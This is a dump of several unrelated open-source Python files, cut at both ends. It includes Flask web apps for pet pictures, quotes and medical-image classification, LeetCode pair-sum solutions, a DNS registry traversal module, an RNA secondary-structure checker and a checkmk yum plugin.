None:\n result = self.get_cc (v, sid, keys, delta+s, ident+1, value)\n\n if result != None:\n return result\n \n def manipulate_coreconf(self, sid, device=None, keys=None, value=None, validate=None):\n cconf = self.to_coreconf(device)\n\n if type(sid) is str:\n sid = self.sid_search_for (sid, space='data')\n\n keys_sid = []\n if keys:\n for e in keys:\n if type(e) is str: # if string is YANG ID then change to SID value\n k_sid = self.sid_search_for(e, space=\"identity\")\n if k_sid != None:\n e = k_sid\n keys_sid.append(e)\n\n if type(value) is str:\n value_sid = self.sid_search_for(value, space=\"identity\")\n if value_sid:\n value = value_sid\n\n json_cconf = cbor.loads(cconf)\n result = self.get_cc(sor=json_cconf, sid=sid, keys=keys_sid, value=value)\n\n if value != None and result == True:\n if validate:\n inst = validate.from_raw(self.convert_to_json(json_cconf))\n inst.validate() # if wrong raise an error\n\n # remove current rule\n for i in range(len(self._ctxt)):\n dev = self._ctxt[i]\n #print (\"Device:\", dev[\"DeviceID\"])\n if dev['DeviceID'] == device:\n self._ctxt.pop(i)\n break\n # add the modified one\n self.from_coreconf(device=device, dev_info=json_cconf)\n return result\n","repo_name":"openschc/openschc","sub_path":"src/gen_rulemanager.py","file_name":"gen_rulemanager.py","file_ext":"py","file_size_in_byte":76849,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"74254353447","text":"import re\nfrom djdns.resolver import Resolver\n\ndef traverse(data, loader, query):\n '''\n data - page to start with\n loader - callback(uri) -> page data\n query - query text to scan for\n\n Generator that outputs branch dicts. You can filter recursion\n by having your loader function return None.\n '''\n for branch in data['branches']:\n selector = branch['selector']\n if re.search(selector, query):\n # Branch matches regex\n yield branch\n for b in _from_targets(branch, loader, query):\n yield b\n\ndef _from_targets(branch, loader, query):\n '''\n Generator that returns branches from a source branch's target.\n '''\n for target_uri in branch['targets']:\n target = loader(target_uri)\n\n if target == None:\n continue\n elif isinstance(target, Resolver):\n # Opaque resolver, such as dns:// URI.\n yield target\n else:\n # Registry page.\n for b in traverse(target, loader, query):\n yield b\n","repo_name":"campadrenalin/python-djdns","sub_path":"djdns/traversal.py","file_name":"traversal.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"53"} +{"seq_id":"4007114091","text":"#find all pairs of integers where sum is equal to the given number\ndef twosum(nums,t):\n for i in range(len(nums)):\n for j in range(i+1,len(nums)):\n if(nums[i]==nums[j]):\n continue\n elif(nums[i]+nums[j]==t):\n print(nums[i],nums[j])\n print(i, j)\nmylist= list(map(int,input().split(\" \")))\ntarget=int(input(\"enter the target value: \"))\ntwosum(mylist,target)","repo_name":"anirbang324/Python_problem_solving_and_DSA","sub_path":"list/two sum(leetcode).py","file_name":"two sum(leetcode).py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37023665746","text":"\"\"\"\nk-diff-pairs-in-an-array\n\"\"\"\nclass Solution:\n def findPairs(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n return self.s_1(k, nums)\n\n def s_1(self, k, nums):\n \"\"\"\n 双指针\n :param k:\n :param nums:\n :return:\n \"\"\"\n if len(nums) < 2:\n return 0\n ans = set()\n nums.sort()\n i, j = 0, 1\n while j < len(nums):\n if nums[j] - nums[i] == k:\n ans.add((nums[i], nums[j]))\n i, j = i + 1, i + 2\n elif nums[j] - nums[i] > k:\n i, j = i + 1, i + 2\n else:\n j += 1\n return len(ans)\n\n\nif __name__ == \"__main__\":\n test = Solution()\n a = test.findPairs([1, 3, 1, 5, 4], 0)\n print(a)","repo_name":"sdlbp/LeetCode","sub_path":"leetcode-algorithms/532. K-diff Pairs in an Array/k-diff-pairs-in-an-array.py","file_name":"k-diff-pairs-in-an-array.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5918996623","text":"# Team ruffLife: Xiaojie(Aaron) Li, Michelle Tang, Bo Hui Lu, Kaitlin Wan\n# SoftDev1 pd6\n# P#01 -- arRESTed Development\n# 2018-11-30\n\nimport os\nimport json\nimport urllib\n\n\nfrom util import userMethods\n\nfrom flask import Flask, request, render_template, session, url_for, redirect, flash\n\n# instantiate flask app\napp = Flask(__name__)\n\n# generate random key\napp.secret_key = os.urandom(32)\nusername = flashMessage = \"\"\nliked_cats = liked_dogs = liked_quotes = liked_facts = \"\"\nimages = texts = []\n\n# root route\n@app.route(\"/\")\ndef home():\n \"\"\"\n If user is logged in, redirect them to their feed.\n If not logged in, prompt login page\n \"\"\"\n if \"user\" in session:\n return redirect(\"/feed\")\n return render_template(\"index.html\")\n\n # authentication route\n@app.route(\"/authenticate\", methods = [\"POST\", \"GET\"])\ndef authenticate():\n \"\"\"\n If a user enters authenticate route manually(without logging in), redirect them back to the right road.\n If a user enters authenticate route after submitting a form:\n * if the username and password is found in the in the database, redirect to their feed\n * if username and/or the password is not found, flash an appropriate message and redirect to login\n \"\"\"\n\n loginStatus = ''\n global username\n\n # if user got here manually, redirect to root\n if request.method == \"GET\" or \"user\" not in request.form.keys():\n return redirect('/')\n\n # check login creation or login\n if \"pass2\" in request.form.keys():\n print(\"\\n\\nCREATING ACCOUNT\\n\")\n loginStatus = userMethods.createAccount(request.form[\"user\"], request.form[\"pass1\"], request.form[\"pass2\"])\n else:\n print(\"\\n\\nCHECKING INFO\\n\")\n loginStatus = userMethods.checkInfo(request.form[\"user\"], request.form[\"pass\"])\n\n # if user successfull logs in, redirects to their feed\n if loginStatus == \"Account creation successful\":\n session[\"user\"] = request.form[\"user\"]\n username = request.form[\"user\"]\n session.pop('_flashes', None)\n flash(loginStatus)\n return render_template(\"index.html\")\n elif loginStatus == \"Login Successful\":\n session[\"user\"] = request.form[\"user\"]\n username = request.form[\"user\"]\n session.pop('_flashes', None)\n flash(loginStatus)\n return redirect(\"/feed\")\n else:\n flash(loginStatus)\n return redirect(\"/\")\n# for logged in users: their complete page\n@app.route(\"/feed\", methods=[\"GET\"])\ndef feed():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # if user not logged in redirect them\n if not(\"user\" in session):\n session.pop('_flashes', None)\n flash(\"You are not logged in.\")\n return redirect(\"/\")\n\n url = \"https://random.dog/woof.json\"\n status = True;\n while(status):\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n dict = json.loads(straw)\n print(dict[\"url\"][-3:])\n if(dict[\"url\"][-3:] != \"mp4\"):\n status = False\n\n url = \"https://aws.random.cat/meow\"\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n cat = json.loads(straw)\n\n url = \"https://catfact.ninja/fact\"\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n cat_fact = json.loads(straw)\n\n url = \"https://dog-api.kinduff.com/api/facts?number=1\"\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n dog_fact = json.loads(straw)\n\n url = urllib.request.urlopen(\"https://favqs.com/api/qotd\")\n data = json.loads(url.read().decode())\n data = data[\"quote\"]\n\n fn = open(\"./api/meme.txt\", \"r\")\n mykeyn = fn.readline().strip()\n url = \"http://api.giphy.com/v1/gifs/random?api_key=\" + mykeyn + \"&tag=meme&rating=pg\"\n #print(\"HIII\")\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n memes = json.loads(straw)\n\n\n url = \"http://randomuselessfact.appspot.com/random.json?language=en\"\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n facts = json.loads(straw)\n # print(facts[\"text\"])\n urls = userMethods.likedImages(username)\n # print(urls)\n\n liked_cats = cat[\"file\"]\n # print(\"\\n\\nPRINTING LIKED_CATS\\n\")\n # print(liked_cats)\n liked_dogs = dict[\"url\"]\n liked_quotes = data[\"body\"]\n liked_facts = facts[\"text\"]\n\n texts = userMethods.likedWords(username)\n texts = texts.split(\"|\")\n texts = texts[1:]\n images = userMethods.likedImages(username)\n images = images.split(\",\")\n images = images[1:]\n\n print(\"\\n-------------------\\n\" + username + \"\\n----------------------\\n\")\n print(\"\\nmeme url: \" + memes['data']['url'] + \"\\n\")\n print(\"\\ncat fact: \" + cat_fact['fact'] + \"\\n\")\n print(\"\\ndog fact: \")\n print(dog_fact['facts'])\n print(\"\\nquote: \" + data[\"body\"] + \"\\n\")\n print(\"----------------\\ntexts: \")\n print(texts)\n print(\"----------------\\nimages: \")\n print(images)\n return render_template(\"feed.html\",\n dog_link = dict['url'],\n cat_link = cat[\"file\"],\n quote = data[\"body\"],\n author = data[\"author\"],\n user = username,\n link = memes['data']['url'],\n em = memes['data']['embed_url'],\n fact = facts[\"text\"],\n catFact = cat_fact['fact'],\n dogFact = dog_fact['facts'][0],\n img_urls = images,\n text_texts = texts)\n\n# reload route will refresh page and go to appropriate section\n@app.route(\"/reload\", methods=[\"GET\", \"POST\"])\ndef reload():\n # check if logged in\n if not (\"user\" in session):\n session.pop('_flashes', None)\n flash(\"You are not logged in.\")\n return redirect(\"/\")\n if request.method == \"POST\":\n return redirect(\"/feed#doge\")\n else:\n return redirect(\"/feed#cat\")\n\n# reload route for facts and quotes, will refresh and go to\n# appropriate section\n@app.route(\"/reload2\", methods=[\"GET\", \"POST\"])\ndef reload2():\n # check if logged in\n if not (\"user\" in session):\n session.pop('_flashes', None)\n flash(\"You are not logged in.\")\n return redirect(\"/\")\n if request.method == \"POST\":\n return redirect(\"/feed#fact\")\n else:\n return redirect(\"/feed#quotes\")\n\n# reload route for memes, will go to appropriate section\n@app.route(\"/reloadMeme\")\ndef reload3():\n # check if logged in\n if not (\"user\" in session):\n session.pop('_flashes', None)\n flash(\"You are not logged in.\")\n return redirect(\"/\")\n return redirect(\"/feed#meme\")\n\n# logout route\n@app.route(\"/logout\")\ndef logout():\n # pop user from session and redirect to login page(root)\n if \"user\" in session:\n session.pop(\"user\")\n session.pop('_flashes', None)\n flash(\"You have been logged out successfully!\")\n return redirect(\"/\")\n\n@app.route(\"/signup\")\ndef signup():\n # otherwise, load the feed\n return render_template(\"signup.html\")\n\n@app.route(\"/home\")\ndef homeee():\n # otherwise, load the feed\n return redirect(\"/\")\n\n# @app.route(\"/feed\")\n# def logginnn():\n# # otherwise, load the feed\n# return render_template(\"feed.html\")\n\n@app.route(\"/quote\")\ndef quote():\n global flashMessage\n global username\n global liked\n global liked_a\n # otherwise, load the feed\n url = 'https://favqs.com/api/qotd'\n s = urllib.request.urlopen(url)\n s = s.read()\n d = json.loads(s)\n session.pop('_flashes', None)\n flashMessage = \"TO LIKE QUOTE, PLEASE LOG IN!!\"\n #flash(flashMessage)\n liked = d['quote']['body']\n liked_a = d['quote'][\"author\"]\n return render_template(\"quote.html\", link = d['quote']['body'], auth = d['quote'][\"author\"] )\n\n@app.route(\"/add_quote\")\ndef add_quote():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # print(\"dkfjhasldkfjdslk\")\n # print (liked_cats)\n print(username)\n userMethods.addWord(username, liked_quotes)\n texts = userMethods.likedWords(username)\n texts = texts.split(\"|\")\n texts = texts[1:]\n # print(\"\\n\\n\\nPRINTING TEXT============\\n\")\n # print(texts)\n session.pop('_flashes', None)\n flash(\"Text liked. Go to liked text to see it!\")\n return redirect(\"/feed\")\n\n@app.route(\"/catpic\")\ndef catpic():\n global flashMessage\n global username\n global liked\n url = \"https://aws.random.cat/meow\"\n s = urllib.request.urlopen(url)\n s = s.read()\n d = json.loads(s)\n session.pop('_flashes', None)\n # print(\"USERNAME\")\n # print (username)\n liked = d['file']\n flashMessage = \"TO LIKE PHOTO, PLEASE LOG IN!!\"\n #flash(flashMessage)\n # otherwise, load the feed\n return render_template(\"catpic.html\", link = d['file'])\n\n@app.route(\"/add_cat\")\ndef add_cat():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # print(\"dkfjhasldkfjdslk\")\n # print (liked_cats)\n # print(username)\n userMethods.addImage(username, liked_cats)\n images = userMethods.likedImages(username)\n images = images.split(\",\")\n images = images[1:]\n # print(\"\\n\\n\\nPRINTING IMAGES============\\n\")\n # print(images)\n session.pop('_flashes', None)\n flash(\"Image liked. Go to liked pictures to see it!\")\n return redirect(\"/feed\")\n\n@app.route(\"/dogpic\")\ndef dogpic():\n global username\n global liked\n url = \"https://random.dog/woof.json\"\n status = True\n while(status):\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n dict = json.loads(straw)\n print(dict[\"url\"][-3:])\n if(dict[\"url\"][-3:] != \"mp4\"):\n status = False\n session.pop('_flashes', None)\n # liked = d['url']\n\n flashMessage = \"TO LIKE PHOTO, PLEASE LOG IN!!\"\n #flash(flashMessage)\n # otherwise, load the feed\n return render_template(\"dogpic.html\", link = dict['url'])\n\n@app.route(\"/add_dog\")\ndef add_dog():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # print(\"dkfjhasldkfjdslk\")\n # print (liked_cats)\n # print(username)\n userMethods.addImage(username, liked_dogs)\n images = userMethods.likedImages(username)\n images = images.split(\",\")\n images = images[1:]\n # print(\"\\n\\n\\nPRINTING IMAGES============\\n\")\n # print(images)\n session.pop('_flashes', None)\n flash(\"Image liked. Go to liked pictures to see it!\")\n return redirect(\"/feed\")\n\n@app.route(\"/fact\")\ndef fact():\n global username\n global liked\n url = \"http://randomuselessfact.appspot.com/random.json?language=en\"\n s = urllib.request.urlopen(url)\n s = s.read()\n d = json.loads(s)\n session.pop('_flashes', None)\n flashMessage = \"TO LIKE FACT, PLEASE LOG IN!!\"\n #flash(flashMessage)\n liked = d['text']\n # print(\"dfadsfds\")\n # print (liked)\n # # otherwise, load the feed\n return render_template(\"fact.html\", link = d['text'])\n\n@app.route(\"/add_fact\")\ndef add_fact():\n global username\n global liked_cats\n global liked_dogs\n global liked_quotes\n global liked_facts\n global dict\n global data\n global memes\n global facts\n global cat\n global images\n global texts\n\n # print(\"dkfjhasldkfjdslk\")\n # print (liked_cats)\n print(username)\n userMethods.addWord(username, liked_facts)\n texts = userMethods.likedWords(username)\n texts = texts.split(\"|\")\n texts = texts[1:]\n # print(\"\\n\\n\\nPRINTING TEXT============\\n\")\n # print(texts)\n session.pop('_flashes', None)\n flash(\"Text liked. Go to liked text to see it!\")\n return redirect(\"/feed\")\n\n@app.route(\"/meme\")\ndef meme():\n global flashMessage\n f = open(\"./api/meme.txt\", \"r\")\n mykey = f.readline().strip()\n url = \"http://api.giphy.com/v1/gifs/random?api_key=\" + mykey + \"&tag=meme&rating=pg\"\n print(url)\n s = urllib.request.urlopen(url)\n s = s.read()\n d = json.loads(s)\n print(d['data']['url'])\n session.pop('_flashes', None)\n flashMessage = \"TO LIKE GIF, PLEASE LOG IN!!\"\n #flash(flashMessage)\n # otherwise, load the feed\n return render_template(\"meme.html\",link = d['data']['url'], em = d['data']['embed_url'])\n\n\n\n# run flask app with debug set to true\nif __name__ == \"__main__\":\n app.run(debug = True)\n","repo_name":"tangym27/ruffLife","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26921351849","text":"from flask import Flask, request, render_template, Response, redirect , url_for\nimport tensorflow as tf\nfrom keras import backend as K\nimport cv2\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport numpy as np\nfrom torchvision import datasets, models, transforms\nimport matplotlib.pyplot as plt\nimport os\nimport PIL.Image as Image\n\nmodel = tf.keras.models.load_model(\"CNN.model\")\nmodel.load_weights(\"model.h5\")\nmodel._make_predict_function()\n\n#from werkzeug import secure_filename\nmodel1 = tf.keras.models.load_model(\"CNN_PNEMONIA.model\")#model.save_weights(\"model.h5\")\nmodel1.load_weights(\"model_pnemonia.h5\")\nmodel1._make_predict_function()\n\n#torch.save(model_conv,'cnn.pt')\nthe_model = torch.load('cnn.pt')\nthe_model.eval()\n\ndef generate_prediction(img):\n IMG_SIZE = 100\n img_array = cv2.imread(img, cv2.IMREAD_GRAYSCALE)\n img_array = img_array/255.0\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE))\n input = new_array.reshape(-1, IMG_SIZE, IMG_SIZE, 1)\n return input\n\ndef generate_prediction_p(img):\n sample_image = cv2.imread(img)\n sample_image = cv2.resize(sample_image, (224,224))\n if sample_image.shape[2] ==1:\n sample_image = np.dstack([sample_image, sample_image, sample_image])\n sample_image = cv2.cvtColor(sample_image, cv2.COLOR_BGR2RGB)\n sample_image = sample_image.astype(np.float32)/255.\n #sample_label = 1\n sample_image_processed = np.expand_dims(sample_image, axis=0)#since we pass only one image,we expand dim to include\n #batch size 1\n return sample_image_processed\n\ndef generate_prediction_t(img):\n sample_image = Image.open(img)\n transform = transforms.Compose([ \n transforms.Resize(256), \n transforms.CenterCrop(224), \n transforms.ToTensor(), \n transforms.Normalize( \n mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225]\n )])\n img_t = transform(sample_image)\n return img_t\n \n\napp = Flask(__name__)\n#app.config[\"IMAGE_UPLOADS\"] = os.getcwd()+\"\\\\static\"\n@app.route('/')\ndef templates():\n return render_template('d.html')\n\n@app.route('/Body_Segment')\ndef Body_Segment():\n return render_template('mypage.html')\n\n@app.route('/Pneumonia_Detection')\ndef Pneumonia_Detection():\n return render_template('mypage1.html')\n\n@app.route('/Tumor_Detection')\ndef Tumor_Detection():\n return render_template('mypage2.html')\n\n@app.route('/results_for_segment', methods=['POST','GET'])\ndef results_for_segment():\n app.config[\"IMAGE_UPLOADS\"] = os.getcwd()+\"\\\\static\"\n\n c = [\"Brain\", \"Hands\", \"Kidney\", \"Legs\", \"Lungs\", \"Skull\", \"Teeth\"]\n K.clear_session()\n if request.method == \"POST\":\n f = request.files['file']\n f.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n FOLDER = f.filename\n predi=generate_prediction(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n \n pred= model.predict(predi)\n predi = list(pred[0])\n #final = dict(zip(c, prediction)) \n prediction = c[predi.index(max(predi))]\n accuracy = max(predi)\n accuracy = round((accuracy * 100),2)\n final_acc = str(accuracy) + \"%\"\n return render_template('mypage.html',image = FOLDER,prediction_text=prediction,prediction_acc = final_acc)\n\n@app.route('/results_for_p', methods=['POST','GET'])\ndef results_for_p():\n app.config[\"IMAGE_UPLOADS\"] = os.getcwd()+\"\\\\static\"\n K.clear_session()\n if request.method == \"POST\":\n f = request.files['file']\n f.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n FOLDER = f.filename\n predi=generate_prediction_p(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n prediction = model1.predict(predi)\n prediction = list(prediction[0])\n #final_acc= prediction.index(max(prediction))\n accuracy = max(prediction)\n accuracy = round((accuracy * 100),2)\n final_acc = str(accuracy) + \"%\"\n if accuracy < 65.00:\n prediction = \"Normal\"\n else:\n prediction = \"Pneumonia\"\n return render_template('mypage1.html',image1 = FOLDER,prediction_text=prediction,prediction_acc = final_acc)\n\n@app.route('/results_for_t', methods=['POST','GET'])\ndef results_for_t():\n app.config[\"IMAGE_UPLOADS\"] = os.getcwd()+\"\\\\static\"\n K.clear_session()\n if request.method == \"POST\":\n f = request.files['file']\n f.save(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n FOLDER = f.filename \n #img_t = transform(app.config[\"IMAGE_UPLOADS\"], f.filename)\n predi = generate_prediction_t(os.path.join(app.config[\"IMAGE_UPLOADS\"], f.filename))\n batch_t = torch.unsqueeze(predi, 0)\n out = the_model(batch_t)\n #print(out.shape)\n class1 = [\"No\", \"Yes\" ]\n _, index = torch.max(out, 1)\n percentage = torch.nn.functional.softmax(out, dim=1)[0] * 100\n prediction = class1[index[0]]\n accuracy = percentage[index[0]].item()\n accuracy = round(accuracy,2)\n final_acc = str(accuracy) + \"%\"\n return render_template('mypage2.html',image2 = FOLDER,prediction_text=prediction,prediction_acc = final_acc)\n\nif __name__ == '__main__':\n #app.debug = True\n app.run(host='192.168.8.25',port=5000)\n \n","repo_name":"PriyankaPSonawane/classify","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70622119527","text":"import time\n####### DATA BASE OF WANTED crRNA STRUCTURES ##### \ndatabase_nupack=[\n###### Structures from NUPACK RUNS#####\n'(((((.((.......)))))))....(((.....)))',\n'(.((((((.((((.....)))).)))))).)', \n'(((((.((.......)))))))....((((...........))))',\n#'(.((((((.((((....)))).)))))).)',\n'...(((((.((.......)))))))....((((...........))))',\n'...(((((.((.......)))))))....((((...........))))',\n'((((((.........).)))))....((((...........))))',\n\n#### lowest lbu backbone structure in NUPACK\n'(((((.((.......)))))))....((((...........))))',\n#### lowest lwa backbone structure in NUPACK\n'((.(((((....((((.........)))).))))).))',\n\n#### subopt lwa backbone alternative\n'(((((....((((.........)))).)))))',\n\n#### STRUCTURE FROM CELL PAPER ####\n'.....(((((.........))))..)....'\n]\n\n\ndatabase_mfold=[\n#lwa backbone structure mfold\n'((.(((((....((((.........)))).))))).))',\n#lsh backbone structure mfold\n'(((((...........)))))'\n#lbu backbone structure mfold\n\n#### Structure Lsh\n'((((((((.((.......)))))))....((((...........))))'\n]\n\n\nsequence_database={\n# LWA BACKBONE\n'lwaCas13a':'GAUUUAGACUACCCCAAAAACGAAGGGGACUAAAAC',\n# LSH BACKBONE\n'lshCas13a':'GGAUAUAGACCACCCCAAUAUCGAAGGGGACUAAAAC',\n# LBU BACKBONE\n'lbuCas13a':'GACCACCCCAAAAAUGAAGGGGACUAAAACA'\n}\n\n####### ANALYSIS FUNCTIONS FOR NUPACK #####\n\ndef analysis_structure(inputfile):\n\twith open(inputfile,'r') as input_file:\n\t\tlines=input_file.readlines()\n\ti=0\n\tresults=[]\n\tfor line in lines:\n\t\t\n\t\tif line[0:3]=='% %':\n\t\t\ttry:\n\t\t\t\tresults.append(lines[i+3])\n\t\t\texcept IndexError:\n\t\t\t\tcontinue\n\t\tif line.startswith('% Sequence:'):\n\t\t\tsequence=line[13:]\n\t\ti=i+1\n\tk=0\n\tj=0\n\tfor structure in database_nupack:\n\t\tk=k+1\n\t\tfor result in results:\n\t\t\t\n#\t\t\tprint structure\n#\t\t\tprint result\n\t\t\tif structure in result:\n#\t\t\t\tprint(count*' ' + str(structure)+(len(result)-(1+count+len(structure)))*' ' +' ######## MATCHED SECONDARY STRUCTURE')\n#\t\t\t\tprint(str(result[0:-2])+' ######## PREDICTED SECONDARY STRUCTURE')\n\t\t\t\tif j==0:\n\t\t\t\t\tcount=result.index(structure)\n\t\t\t\t\tprint('\\nGOOD NEWS! YOU\\'VE GOT THE RIGHT SECONDARY STRUCTURE!')\n\t\t\t\t\tprint('YOUR SEQUENCE WAS:\\n')\n\t\t\t\t\tprint(sequence)\n#\t\t\t\t\tprint('THE MATCHED SECONDARY STRUCTURE IS:')\n\t\t\t\t\tprint(count*' ' + str(structure)+(len(result)-(1+count+len(structure)))*' ' +' ######## MATCHED SECONDARY STRUCTURE')\n\t\t\t\t\tprint(str(result[0:-2])+' ######## PREDICTED SECONDARY STRUCTURE')\n\t\t\t\t\tj=j+1\n\t\t\telif k==len(database_nupack):\n\t\t\t\tif j==0:\n\t\t\t\t\tprint('''\n\t\t#################### CAUTION! ##################### \n\t\tYOUR SECONDARY STRUCTURE DOES NOT FIT OUR DATA BANK\n\t\t#################### CAUTION! #####################\\n\\n ''')\n\t\t\t\t\tprint('YOUR SEQUENCE AND MOST STABLE PREDICTED STRUCTURE IS:\\n')\n#\t\t\t\tprint(sequence)\n#\t\t\t\tprint('THE PREDICTED MOST STABLE STRUCTURE IS:')\n\t\t\t\t\tprint(sequence[0:-2])\n\t\t\t\t\tprint(str(results[0][0:-2]))\n\t\t\t\t\n\t\t\t\n\treturn()\n\ndef mfold_analysis(input):\n\tprint('''\n\n#######################################################################################\n#################### MFOLD SECONDARY STRUCTURE VERIFICATION ###########################\n#######################################################################################\n\n''')\n\tsequence, structure_in = input\n\tresult=structure_in[:-9]\n\tenergy=structure_in[-10:-2]\n\tenergy=energy.replace('\\t','')\n\tenergy=energy.replace('(','')\n\tenergy=energy.replace(')','')\n\tenergy=energy.replace(' ','')\n#\tprint sequence\n#\tprint result\n#\tprint energy\n\tk=0\n\tj=0\n\t\n\tfor structure in database_mfold:\n\t\tk=k+1\n\t\tif structure in result:\n#\t\t\t\tprint(count*' ' + str(structure)+(len(result)-(1+count+len(structure)))*' ' +' ######## MATCHED SECONDARY STRUCTURE')\n#\t\t\t\tprint(str(result[0:-2])+' ######## PREDICTED SECONDARY STRUCTURE')\n\t\t\tif j==0:\n\t\t\t\tcount=result.index(structure)\n\t\t\t\t\n\t\t\t\tprint('\\nGOOD NEWS! mFOLD WEBSERVER CONFIRMS YOUR STRUCTURE')\n\t\t\t\tprint('YOUR SEQUENCE WAS:\\n')\n\t\t\t\tprint(sequence)\n#\t\t\t\tprint('THE MATCHED SECONDARY STRUCTURE IS:')\n\t\t\t\tprint(count*' ' + str(structure)+(len(result)-(1+count+len(structure)))*' ' +' ######## MATCHED SECONDARY STRUCTURE')\n\t\t\t\tprint(str(result[0:-2])+' ######## PREDICTED SECONDARY STRUCTURE')\n\t\t\t\tj=j+1\n\t\telif k==1:\n\t\t\tif j==0:\n\t\t\t\tprint('''\n\t\t#################### CAUTION! ##################### \n\t\tmFOLD SECONDARY STRUCTURE DOES NOT FIT OUR DATA BANK\n\t\t#################### CAUTION! #####################\\n\\n''')\n\t\t\t\tprint('YOUR SEQUENCE AND MOST STABLE PREDICTED STRUCTURE IS:\\n')\n#\t\t\t\tprint(sequence)\n#\t\t\t\tprint('THE PREDICTED MOST STABLE STRUCTURE IS:')\n\t\t\t\tprint(sequence[0:-2])\n\t\t\t\tprint(str(result[0:-2]))\n\tprint('______________________________________________________________________________________\\n')\n\tprint('Job ended normally. '+str(time.strftime(\"%c\")))\n\n\ndef free_energy(inputfile):\n\twith open(inputfile,'r') as input_file:\n\t\tlines=input_file.readlines()\n\ti=0\n\tfree_energies=[]\n\tfor line in lines:\n\t\t\n\t\tif line[0:3]=='% %':\n\t\t\ttry:\n\t\t\t\tfree_energies.append(lines[i+2])\n\t\t\texcept IndexError:\n\t\t\t\tcontinue\n\t\ti=i+1\n\t\n\t\t\t\n\treturn()\n\ndef analysis_sequence(inputfile):\n\twith open(inputfile,'r') as input_file:\n\t\tlines=input_file.readlines()\n\ti=0\n\tfor line in lines:\n\t\t\n\t\tif line.startswith('% Sequence:'):\n\t\t\tsequence=line[12:]\n\t\ti=i+1\n\tj=0\n\tk=0\n\tfor seq in sequence_database:\n#\t\tprint(seq)\n\t\tif sequence_database[seq] in sequence:\n\t\t\tif j==0:\n\t\t\t\tprint(len(sequence)*'_' + '\\n')\n\t\t\t\tprint( '\t\tYOUR BACKBONE SEQUENCE HAS BEEN FOUND IN THE DATABANK')\n\t\t\t\tprint( '\t\tIT CORRESPONDS TO THE BACKBONE SEQUENCE OF: '+str(seq))\n\t\t\t\tprint('______________________________________________________________________________________\\n')\n\t\t\t\tprint('Job ended normally. '+str(time.strftime(\"%c\")))\n#\t\t\t\tprint(seq)\n\t\t\t\tj=j+1\n\t\telse:\n\t\t\tif k==len(sequence_database):\n\t\t\t\tprint('''\n\t\t#################### CAUTION! ##################### \n\t\tBACKBONE STRUCTURE UNKNOWN, PLEASE HANDLE WITH CARE\n\t\t#################### CAUTION! #####################\\n\\n ''')\n\t\t\t\tprint('______________________________________________________________________________________\\n')\n\t\t\t\tprint('Job ended normally. '+str(time.strftime(\"%c\")))\n\treturn()\n\t\n\t\n\t\n#analysis_structure('input.tmp.subopt')\n#analysis_sequence('input.tmp.subopt')\n\n\n","repo_name":"igemsoftware2017/igem_munich_2017","sub_path":"python/secondary_structure_analysis.py","file_name":"secondary_structure_analysis.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25221309577","text":"#!/usr/bin/env python3\n# -*- encoding: utf-8; py-indent-offset: 4 -*-\n\nfrom pathlib import Path\nfrom typing import Any, Dict\n\nfrom .bakery_api.v1 import FileGenerator, OS, Plugin, register\n\n\ndef get_yum_files(conf: Dict[str, Any]) -> FileGenerator:\n yield Plugin(base_os=OS.LINUX,\n source=Path(\"yum\"),\n interval=conf.get(\"interval\"))\n\n\nregister.bakery_plugin(\n name=\"yum\",\n files_function=get_yum_files,\n)\n","repo_name":"HenriWahl/checkmk-agent-plugin-yum","sub_path":"lib/python3/cmk/base/cee/plugins/bakery/yum.py","file_name":"yum.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"53"} +{"seq_id":"4011162541","text":"#1.write a python function to find the max of three numbers.\r\nx= int(input())\r\ny= int(input())\r\nz= int(input())\r\ndef fun1(x,y): #x=11 , y= 14\r\n if x > y:\r\n return x\r\n return y\r\ndef fun2( x, y, z ):\r\n return fun1( x, fun1( y, z ))\r\nprint(fun2(x,y,z))\r\n\r\n# # #2.Write a Python function to sum all the numbers in a list.\r\n# def sum(numbers):\r\n# total = 0\r\n# for x in numbers:\r\n# total += x\r\n# 